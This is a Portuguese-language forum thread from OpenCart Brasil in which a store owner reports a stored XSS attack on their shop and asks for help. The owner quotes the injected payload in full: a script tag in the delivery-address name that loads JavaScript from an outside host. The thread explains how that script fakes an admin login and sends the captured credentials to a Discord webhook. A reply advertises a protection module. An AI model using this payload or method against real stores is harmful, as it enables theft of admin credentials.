Fórum OpenCart Brasil

Por um e-commerce livre, confiável e profissional.
https://forum.opencartbrasil.com.br/

Tentativa de invasão

https://forum.opencartbrasil.com.br/viewtopic.php?t=23065

Página 1 de 1

Tentativa de invasão

Enviado: 14 Abr 2025, 15:59
por rlasmar
Estão tentando invadir minha loja, como se proteger disso?

O hacker criou um pedido, com dados que parecem reais, nome ana julia.
Ao clicar no pedido, ele automaticamente redireciona para uma página pedindo login e senha. Só acontece se clicar no pedido

Verifiquei que o hacker altera o nome do endereço de entrega para:
Código: Selecionar todos
'"><script Src=https://odi.com.br/cp.js></script>
Ou seja, ele direciona para esse script hospedado em outro site: https://odi.com.br/cp.js

Ao analisar o script:
Substitui completamente o conteúdo do site (document.getElementsByTagName("html")[0].innerHTML = ...):

Ele injeta um HTML falso com um modal de login aparentemente legítimo, simulando o site

Coleta informações digitadas no formulário:

Os campos de "usuário" e "senha" são capturados.

Envia essas informações para um Webhook no Discord:

const webhookUrl = 'https://discord.com/api/webhooks/...';
Isso é usado para que o invasor receba os dados em tempo real assim que alguém preencher o formulário e clicar em "Entrar".

Redireciona o usuário para a área administrativa real do site (/admin/index.php):

Isso dá a falsa impressão de que o login foi bem-sucedido, enganando ainda mais a vítima.

Re: Tentativa de invasão

Enviado: 14 Abr 2025, 16:38
por rlasmar
Como ocorre o hacker.

1. Ele cria uma conta nome real, por exemplo: Ana Julia
2. Ele altera o nome da pessoa do endereço de entrega e cola o código abaixo
3. Ele coloca o código dele: '"><script Src=https://odi.com.br/cp.js></script>
4. Ele gera o pedido na loja.
5. Eu dentro do admin, se eu clicar no pedido que ele gerou, me direciona para uma página solicitando login e senha. Isso só ocorre se eu clicar no pedido.

@Manoel Vidal

Re: Tentativa de invasão

Enviado: 16 Abr 2025, 18:59
por leandrorppo
Olá! Tudo bem?

Desenvolvi uma proteção completa contra invasão XSS (cross-site scripting).
Modificação essencial para todos que têm lojas na plataforma.
Criei um XML que altera mantendo próximo do padrão nativo.
São várias formas de proteger em muitos fatores com verificações e filtros finalizando no banco de dados.
Compatível com todas versões 3.X
Desenvolvi com base no tema Default, para outros temas pode ser necessário adaptações e o mesmo para checkouts que não são o padrão.
Se quiser apresento para você mostrando como funciona a invasão e como protejo.

Se quiser saber mais detalhes:
15 98152-9807
Todos os horários são UTC-03:00
Página 1 de 1

Powered by phpBB® Forum Software © phpBB Limited

Traduzido por: Suporte phpBB